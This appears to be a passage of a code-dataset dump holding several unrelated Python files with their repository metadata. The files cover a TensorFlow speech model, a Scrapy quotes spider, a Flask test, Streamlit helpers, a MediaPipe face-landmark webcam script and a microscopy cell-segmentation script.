tf.norm(inputs, axis=-1)\n sim_mat = sim_mat / (norms[:, tf.newaxis, :] * norms[:, :, tf.newaxis] + 1e-8)\n\n sim_mat *= sim_mat_g\n # keras divides activity regularizer by batch size.....\n # so we counteract that there\n factor = tf.cast(tf.shape(inputs)[0], tf.float32) if on_activities else 1.\n return factor * -tf.reduce_mean(sim_mat) / tf.reduce_mean(sim_mat_g)\n\n return neighbor_distance\n", "repo_name": "xdurch0/asr2", "sub_path": "w2l/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 31430, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.isdir", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 47, "usage_type": "call"}, {"api_name": "tensorflow.summary.create_file_writer", "line_number": 50, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 50, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Conv1D", "line_number": 85, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 85, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.ReLU", "line_number": 94, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 94, "usage_type": "name"}, {"api_name": "tensorflow.where", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.greater", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.where", "line_number": 102, "usage_type": "call"}, {"api_name": "tensorflow.greater_equal", "line_number": 102, "usage_type": "call"}, {"api_name": "tensorflow.custom_gradient", "line_number": 97, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 107, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 107, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 109, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 109, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 112, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 112, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 115, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 115, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 118, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 118, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 121, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 121, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 124, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 124, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 127, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 127, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 130, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 130, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 133, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 133, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 136, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 136, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 139, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 139, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Conv1D", "line_number": 141, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 141, "usage_type": "name"}, {"api_name": "tensorflow.keras.Input", "line_number": 146, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 146, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.Model", "line_number": 154, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 154, "usage_type": "attribute"}, {"api_name": "tensorflow.transpose", "line_number": 174, "usage_type": "call"}, {"api_name": "tensorflow.GradientTape", "line_number": 199, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 203, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 206, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 209, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 209, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 212, "usage_type": "call"}, {"api_name": "tensorflow.nn.ctc_loss", "line_number": 212, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 212, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 218, "usage_type": "call"}, {"api_name": "tensorflow.nn.ctc_loss", "line_number": 218, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 218, "usage_type": "attribute"}, {"api_name": "tensorflow.math.add_n", "line_number": 224, "usage_type": "call"}, {"api_name": "tensorflow.math", "line_number": 224, "usage_type": "attribute"}, {"api_name": "tensorflow.optimizers.schedules.PiecewiseConstantDecay", "line_number": 256, "usage_type": "call"}, {"api_name": "tensorflow.optimizers", "line_number": 256, "usage_type": "attribute"}, {"api_name": "tensorflow.optimizers.Adam", "line_number": 259, "usage_type": "call"}, {"api_name": "tensorflow.optimizers", "line_number": 259, "usage_type": "attribute"}, {"api_name": "tensorflow.function", "line_number": 268, "usage_type": "call"}, {"api_name": "tensorflow.TensorSpec", "line_number": 269, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 269, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorSpec", "line_number": 270, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 270, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorSpec", "line_number": 271, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 271, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorSpec", "line_number": 272, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 272, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 275, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 279, "usage_type": "call"}, {"api_name": "os.path", "line_number": 279, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 286, "usage_type": "call"}, {"api_name": "tensorflow.summary.scalar", "line_number": 292, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 292, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.scalar", "line_number": 294, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 294, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 299, "usage_type": "call"}, {"api_name": "os.path", "line_number": 299, "usage_type": "attribute"}, {"api_name": "tensorflow.transpose", "line_number": 326, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 328, "usage_type": "call"}, {"api_name": "tensorflow.name_scope", "line_number": 353, "usage_type": "call"}, {"api_name": "tensorflow.nn.ctc_beam_search_decoder", "line_number": 354, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 354, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 357, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 357, "usage_type": "attribute"}, {"api_name": "tensorflow.sparse.to_dense", "line_number": 362, "usage_type": "call"}, {"api_name": "tensorflow.sparse", "line_number": 362, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 367, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 374, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 391, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 392, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 392, "usage_type": "attribute"}, {"api_name": "tensorflow.logical_or", "line_number": 396, "usage_type": "call"}, {"api_name": "tensorflow.greater", "line_number": 396, "usage_type": "call"}, {"api_name": "tensorflow.math.mod", "line_number": 396, "usage_type": "call"}, {"api_name": "tensorflow.math", "line_number": 396, "usage_type": "attribute"}, {"api_name": "tensorflow.equal", "line_number": 397, "usage_type": "call"}, {"api_name": "tensorflow.range", "line_number": 400, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 400, "usage_type": "attribute"}, {"api_name": "tensorflow.ones", "line_number": 401, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 401, "usage_type": "attribute"}, {"api_name": "tensorflow.stack", "line_number": 402, "usage_type": "call"}, {"api_name": "tensorflow.linalg.lstsq", "line_number": 403, "usage_type": "call"}, {"api_name": "tensorflow.linalg", "line_number": 403, "usage_type": "attribute"}, {"api_name": "tensorflow.newaxis", "line_number": 403, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_sum", "line_number": 409, "usage_type": "call"}, {"api_name": "tensorflow.square", "line_number": 410, "usage_type": "call"}, {"api_name": "tensorflow_probability.distributions.Normal", "line_number": 412, "usage_type": "call"}, {"api_name": "tensorflow_probability.distributions", "line_number": 412, "usage_type": "attribute"}, {"api_name": "tensorflow.sqrt", "line_number": 412, "usage_type": "call"}, {"api_name": "tensorflow.less_equal", "line_number": 416, "usage_type": "call"}, {"api_name": "tensorflow.concat", "line_number": 424, "usage_type": "call"}, {"api_name": "tensorflow.name_scope", "line_number": 442, "usage_type": "call"}, {"api_name": "tensorflow.where", "line_number": 443, "usage_type": "call"}, {"api_name": "tensorflow.not_equal", "line_number": 443, "usage_type": "call"}, {"api_name": "tensorflow.gather_nd", "line_number": 445, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 447, "usage_type": "call"}, {"api_name": "tensorflow.int64", "line_number": 448, "usage_type": "attribute"}, {"api_name": "tensorflow.SparseTensor", "line_number": 449, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 496, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 496, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 550, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 550, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 551, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 551, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 557, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 559, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 561, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 568, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 568, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 572, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 579, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 581, "usage_type": "attribute"}, {"api_name": "numpy.tile", "line_number": 589, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 594, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 596, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 597, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 629, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 630, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 632, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 633, "usage_type": "call"}, {"api_name": "tensorflow.norm", "line_number": 644, "usage_type": "call"}, {"api_name": "tensorflow.norm", "line_number": 646, "usage_type": "call"}, {"api_name": "tensorflow.norm", "line_number": 648, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 648, "usage_type": "attribute"}, {"api_name": "tensorflow.gather", "line_number": 651, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 652, "usage_type": "call"}, {"api_name": "tensorflow.gather", "line_number": 655, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 660, "usage_type": "call"}, {"api_name": "tensorflow.abs", "line_number": 660, "usage_type": "call"}, {"api_name": "tensorflow.sqrt", "line_number": 663, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 664, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 666, "usage_type": "call"}, {"api_name": "tensorflow.abs", "line_number": 666, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 669, "usage_type": "call"}, {"api_name": "tensorflow.norm", "line_number": 670, "usage_type": "call"}, {"api_name": "tensorflow.norm", "line_number": 671, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 681, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 686, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 686, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 686, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_sum", "line_number": 687, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 703, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 703, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 706, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 707, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 713, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 721, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 729, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 745, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 746, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 748, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 749, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 752, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 752, "usage_type": "call"}, {"api_name": "tensorflow.norm", "line_number": 753, "usage_type": "call"}, {"api_name": "tensorflow.newaxis", "line_number": 754, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 759, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 759, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 759, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 760, "usage_type": "call"}]} +{"seq_id": "36374248450", "text": " #_*_ coding:utf-8 _*_ \n\nimport scrapy\n\n#通过getattr传入tag参数,构建类似于 http://quotes.toscrape.com/tag/humor形式的url\nclass Author_Spider(scrapy.Spider):\n\tname='tag'\n\tdef start_requests(self):\n\t\turl='http://quotes.toscrape.com/'\n\t\ttag=getattr(self,'tag',None)\n\t\tif tag:\n\t\t\turl=url+'tag/'+tag\n\t\tyield scrapy.Request(url=url,callback=self.parse)\n\t\t\n\n\tdef parse(self,response):\n\t\tself.log('Now running %s'%self.name)\n\n\t\tfor quote in response.css('div.quote'):\n\t\t\tyield dict(text=quote.css('span.text::text').extract_first(),\n\t\t\t\t\t\tauthor=quote.css('small.author::text').extract_first(),\n\t\t\t\t\t\t)\n\n\t\t#解析下一页\n\t\tfor href in response.css('li.next a::attr(href)'):\n\t\t\tyield response.follow(url=href,callback=self.parse)\n\n\t", "repo_name": "chinaylssly/scrapy", "sub_path": "tutorial/tutorial/spiders/tag_spider.py", "file_name": "tag_spider.py", "file_ext": "py", "file_size_in_byte": 741, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "scrapy.Spider", "line_number": 6, "usage_type": "attribute"}, {"api_name": "scrapy.Request", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "23935435680", "text": "\nfrom unittest import TestCase\n\nfrom flask_injector import FlaskInjector\nfrom injector import Injector\n\nfrom autobrew.configuration import configure_test\nfrom autobrew.webserver import app\n\n\nclass TestBrewWebserver(TestCase):\n def make_client(self):\n self.injector = Injector([configure_test])\n FlaskInjector(app=app, injector=self.injector)\n return app.test_client()\n\n def test_update_status(self):\n client = self.make_client()\n response = client.get(\"/brews/new?name=statusbrew\")\n self.assertEqual(response.status_code, 200)\n\n response = client.get(\"/brews/0/status?stage=BOTTLE_CONDITIONING\")\n self.assertEqual(response.status_code, 200)\n\n response = client.get(\"/brews/\")\n self.assertIn(\"CONDITIONING\", str(response.data))\n\n response = client.get(\"/brews/0/complete\")\n self.assertEqual(response.status_code, 200)\n\n response = client.get(\"/brews/\")\n self.assertIn(\"COMPLETE\", str(response.data))\n\n\n", "repo_name": "paulharte/autobrew", "sub_path": "test/brew/test_brew_endpoints.py", "file_name": "test_brew_endpoints.py", "file_ext": "py", "file_size_in_byte": 1005, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "52", "api": [{"api_name": "unittest.TestCase", "line_number": 11, "usage_type": "name"}, {"api_name": "injector.Injector", "line_number": 13, "usage_type": "call"}, {"api_name": "autobrew.configuration.configure_test", "line_number": 13, "usage_type": "name"}, {"api_name": "flask_injector.FlaskInjector", "line_number": 14, "usage_type": "call"}, {"api_name": "autobrew.webserver.app", "line_number": 14, "usage_type": "name"}, {"api_name": "autobrew.webserver.app.test_client", "line_number": 15, "usage_type": "call"}, {"api_name": "autobrew.webserver.app", "line_number": 15, "usage_type": "name"}]} +{"seq_id": "32315767614", "text": "from modules.database import *\nimport streamlit as st\n\n\ndef InitPageSetting(st, path, PAGE_NAME, PAGE_ICON, name_file_css=\"\"):\n current_dir = path\n CSS_MAIN = current_dir / \"assets\" / \"styles\" / \"main.css\"\n st.set_page_config(PAGE_NAME, PAGE_ICON)\n if name_file_css:\n css_file = current_dir/\"assets\" / \"styles\" / name_file_css\n Custom_CSS(st, CSS_MAIN)\n Custom_CSS(st, css_file)\n else:\n Custom_CSS(st, CSS_MAIN)\n\n\ndef Custom_CSS(st, css_file):\n with open(css_file) as f:\n st.markdown(\"\".format(f.read()),\n unsafe_allow_html=True)\n\n\ndef Custom_Code(st, data):\n st.markdown(data, unsafe_allow_html=True)\n\n\ndef Custom_Title(st, title):\n st.subheader(title)\n st.markdown(\"#\")\n \ndef download_button(label, file_path, key=None):\n with open(file_path, \"rb\") as f:\n file_contents = f.read()\n st.download_button(label, data=file_contents, file_name=file_path.split(\"/\")[-1], key=key)", "repo_name": "baolongdev/Tinhoc12", "sub_path": "modules/modules.py", "file_name": "modules.py", "file_ext": "py", "file_size_in_byte": 988, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "streamlit.set_page_config", "line_number": 8, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 19, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 24, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 28, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 29, "usage_type": "call"}, {"api_name": "streamlit.download_button", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "71620460965", "text": "import cv2\nimport numpy as np\nfrom typing import Tuple, Union\nimport math\nimport mediapipe as mp\nfrom mediapipe.tasks import python\nfrom mediapipe.tasks.python import vision\nfrom mediapipe import solutions\nfrom mediapipe.framework.formats import landmark_pb2\nimport matplotlib.pyplot as plt\n\nfrom run import face_detection,face_landmark\n\n\n\ncap = cv2.VideoCapture(0) \n\n\nwhile True:\n ret, frame = cap.read() \n\n if ret == False:\n break\n\n frame = cv2.cvtColor(frame,cv2.COLOR_BGR2RGB)\n frame_mp = mp.Image(image_format=mp.ImageFormat.SRGB, data=frame)\n\n\n detection_result_FD = face_detection.run_face_detection(frame_mp)\n\n\n frame_copy = np.copy(frame_mp.numpy_view())\n annotated_image = face_detection.visualize(frame_copy, detection_result_FD)\n rgb_annotated_image = cv2.cvtColor(annotated_image, cv2.COLOR_BGR2RGB)\n \n \n \n for detection in detection_result_FD.detections:\n bounding_box = detection.bounding_box\n left_top = (bounding_box.origin_x, bounding_box.origin_y)\n right_bottom = (bounding_box.origin_x + bounding_box.width, bounding_box.origin_y + bounding_box.height)\n cropped_image = frame[int(left_top[1])-200:int(right_bottom[1])+50, int(left_top[0])-50:int(right_bottom[0])+50]\n cropped_image = cv2.cvtColor(cropped_image,cv2.COLOR_BGR2RGB)\n\n if detection_result_FD.detections:\n cropped_image_mp = mp.Image(image_format=mp.ImageFormat.SRGB, data=cropped_image)\n \n detection_result_FL = face_landmark.run_face_landmark(cropped_image_mp)\n\n # print(face_landmark.asy_val(detection_result_FL))\n # annotated_image = face_landmark.draw_landmarks_on_image(cropped_image_mp.numpy_view(), detection_result_FL)\n\n rotated_img = face_landmark.align_face(detection_result_FL,cropped_image)\n rotated_img_mp = mp.Image(image_format=mp.ImageFormat.SRGB, data=rotated_img)\n\n detection_result_RI = face_landmark.run_face_landmark(rotated_img_mp)\n\n annotated_image = face_landmark.draw_landmarks_on_image(rotated_img_mp.numpy_view(), detection_result_RI)\n\n asy_angle = face_landmark.asy_val(detection_result_RI,rotated_img)\n\n if asy_angle > 25:\n cv2.putText(annotated_image, str(asy_angle) , (50,50), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\n\n else:\n cv2.putText(annotated_image, str(asy_angle) , (50,50), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 2)\n \n cv2.imshow('result',annotated_image)\n # cv2.imshow('result',rotated_img)\n cv2.imshow('test',rgb_annotated_image)\n if cv2.waitKey(10) & 0xFF == ord('q'): # 'q' 키를 누르면 종료합니다.\n break\n\n\n\n", "repo_name": "HCW0727/SOKDOC", "sub_path": "main_webcam.py", "file_name": "main_webcam.py", "file_ext": "py", "file_size_in_byte": 2547, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.VideoCapture", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 25, "usage_type": "attribute"}, {"api_name": "mediapipe.Image", "line_number": 26, "usage_type": "call"}, {"api_name": "mediapipe.ImageFormat", "line_number": 26, "usage_type": "attribute"}, {"api_name": "run.face_detection.run_face_detection", "line_number": 29, "usage_type": "call"}, {"api_name": "run.face_detection", "line_number": 29, "usage_type": "name"}, {"api_name": "numpy.copy", "line_number": 32, "usage_type": "call"}, {"api_name": "run.face_detection.visualize", "line_number": 33, "usage_type": "call"}, {"api_name": "run.face_detection", "line_number": 33, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 34, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 43, "usage_type": "attribute"}, {"api_name": "mediapipe.Image", "line_number": 46, "usage_type": "call"}, {"api_name": "mediapipe.ImageFormat", "line_number": 46, "usage_type": "attribute"}, {"api_name": "run.face_landmark.run_face_landmark", "line_number": 48, "usage_type": "call"}, {"api_name": "run.face_landmark", "line_number": 48, "usage_type": "name"}, {"api_name": "run.face_landmark.align_face", "line_number": 53, "usage_type": "call"}, {"api_name": "run.face_landmark", "line_number": 53, "usage_type": "name"}, {"api_name": "mediapipe.Image", "line_number": 54, "usage_type": "call"}, {"api_name": "mediapipe.ImageFormat", "line_number": 54, "usage_type": "attribute"}, {"api_name": "run.face_landmark.run_face_landmark", "line_number": 56, "usage_type": "call"}, {"api_name": "run.face_landmark", "line_number": 56, "usage_type": "name"}, {"api_name": "run.face_landmark.draw_landmarks_on_image", "line_number": 58, "usage_type": "call"}, {"api_name": "run.face_landmark", "line_number": 58, "usage_type": "name"}, {"api_name": "run.face_landmark.asy_val", "line_number": 60, "usage_type": "call"}, {"api_name": "run.face_landmark", "line_number": 60, "usage_type": "name"}, {"api_name": "cv2.putText", "line_number": 63, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 63, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 66, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 66, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 68, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 70, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "39340632583", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 21 16:36:35 2020\n\nSegment cells and remove lipofuscin pixels\n\n@author: Amrita S\n\"\"\"\nfrom IPython import get_ipython\nipython = get_ipython()\nipython.magic(\"gui qt5\") \n\nimport napari\nfrom PIL import Image\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\nimport matplotlib.colors as colors\nimport time\n\nimport pickle as pkl\nfrom os.path import sep\n\nimport Cell\nimport pixels_in_roi\nimport diff_gauss\nimport scatter_channels\nimport hist_channels\nimport m_dist\n\n# %% Load images\nt0 = time.time()\nfolder = 'G:\\\\Shared drives\\\\as_share\\\\HCR\\\\HCR_10.17\\\\S2_DAPI_546_647_514_594_2019_10_19__16_28_49'\nplane_nos = range(1, 16)\n\n# base_filename2 = 'S1_dapi_546_488_647_s2z'\nbase_filename = 'S2_DAPI_546_647_514_594_2019_10_19__16_28_49_z'\nn = len(plane_nos)\nprint('Number of planes: {0}'.format(n))\n\n# Create 4D array to store images\nimg = Image.open('{0}\\\\{1}{2}c4_ORG.tif'.format(folder, base_filename, str(plane_nos[0]).zfill(2)))\n\nh = img.height\nw = img.width\nim_array_gad1 = np.zeros([n, h, w])\nim_array_vip = np.zeros([n, h, w])\nim_array_sst = np.zeros([n, h, w])\nim_array_ndnf = np.zeros([n, h, w])\nprint('Size of image in pixels: {0} X {1} X {2}'.format(n, h, w))\n\nfor i in range(n):\n print('Loading image {0}, {1} seconds'.format(i + 1, np.round(time.time() - t0)))\n p = plane_nos[i]\n img_gad1 = Image.open('{0}\\{1}{2}c4_ORG.tif'.format(folder, base_filename, str(p).zfill(2)))\n img_vip = Image.open('{0}\\{1}{2}c2_ORG.tif'.format(folder, base_filename, str(p).zfill(2)))\n img_sst = Image.open('{0}\\{1}{2}c5_ORG.tif'.format(folder, base_filename, str(p).zfill(2)))\n img_ndnf = Image.open('{0}\\{1}{2}c3_ORG.tif'.format(folder, base_filename, str(p).zfill(2)))\n try:\n im_array_gad1[i, :, :] = np.array(img_gad1)\n im_array_vip[i, :, :] = np.array(img_vip)\n im_array_sst[i, :, :] = np.array(img_sst)\n im_array_ndnf[i, :, :] = np.array(img_ndnf)\n except:\n print('Plane {0} could not be loaded'.format(p))\n print('Size of plane {0} in pixels: {0} X {1}'.format(img.height, img.width))\n im_array_gad1 = np.delete(im_array_gad1, i, axis = 0)\n im_array_vip = np.delete(im_array_vip, i, axis = 0)\n im_array_sst = np.delete(im_array_sst, i, axis = 0)\n im_array_ndnf = np.delete(im_array_ndnf, i, axis = 0)\n plane_nos.remove(p)\n i -= 1\n n = len(plane_nos)\n continue\n\ndel img_gad1\ndel img_vip\ndel img_sst\ndel img_ndnf\n\n# %% Render image in napari gui\n\nviewer = napari.Viewer()\nviewer.add_image(im_array_gad1, name = 'Gad1', colormap = 'cyan', blending = 'additive')\nviewer.add_image(im_array_ndnf, name = 'Ndnf', colormap = 'magenta', blending = 'additive')\nviewer.add_image(im_array_vip, name = 'Vip', colormap = 'yellow', blending = 'additive')\nviewer.add_image(im_array_sst, name = 'Sst', colormap = 'green', blending = 'additive')\n\n# %% Load cell rois\n# Load masks if they already exist\nsave_loc = 'G:\\\\Shared drives\\\\as_share\\\\HCR\\\\HCR_10.17'\nsave_file= 'S2_data.pkl'\ntry:\n with open('{0}\\{1}'.format(save_loc, save_file), 'rb') as f:\n Cell.cell_data = pkl.load(f)\n indices = list(Cell.cell_data.keys())\n if not np.max(indices) == len(indices):\n print('Re-numbering cells to be consecutive')\n Cell.cell_data_temp = {}\n for i in range(len(indices)):\n Cell.cell_data_temp[i + 1] = Cell.cell_data[indices[i]]\n Cell.cell_data_temp[i + 1]['cell_id'] = i + 1\n Cell.cell_data = Cell.cell_data_temp \n with open('{0}\\{1}'.format(save_loc, save_file), 'wb') as f:\n pkl.dump(Cell.cell_data, f)\n Cell.n_cells = i + 1\n else:\n Cell.n_cells = len(indices)\n print('{0} cells found'.format(Cell.n_cells))\nexcept:\n print('No data found')\n\n\n# %% Add masks to napari viewer\n\nmask_layer = viewer.add_shapes(name = 'Cell masks')\n\nindices = list(Cell.cell_data.keys())\nfor cell in indices:\n if np.mod(cell, 10) == 0:\n print('Cell {0}'.format(cell))\n planes = Cell.cell_data[cell]['z_planes']\n for plane in planes:\n mask = Cell.cell_data[cell]['masks'][plane]\n mask = np.concatenate((np.ones([mask.shape[0], 1])*plane, mask), axis = 1)\n mask_layer.add(mask, shape_type = 'polygon', opacity = 0.2, face_color = 'white', edge_color = 'red', edge_width = 3)\n\n\n# %% Load lipofuscin rois\nsave_loc = 'G:\\\\Shared drives\\\\as_share\\\\HCR\\\\HCR_10.17'\nsave_file = 'HCR_10.17_S2_lipofuscin_rois_in_cells.pkl'\n\nwith open('{0}\\\\{1}'.format(save_loc, save_file), 'rb') as f:\n l_rois = pkl.load(f) \n\n# %% Add lipofuscin rois to viewer\nn_rois = len(l_rois)\nprint('{0} rois found'.format(n_rois))\nviewer.add_shapes(l_rois, name = 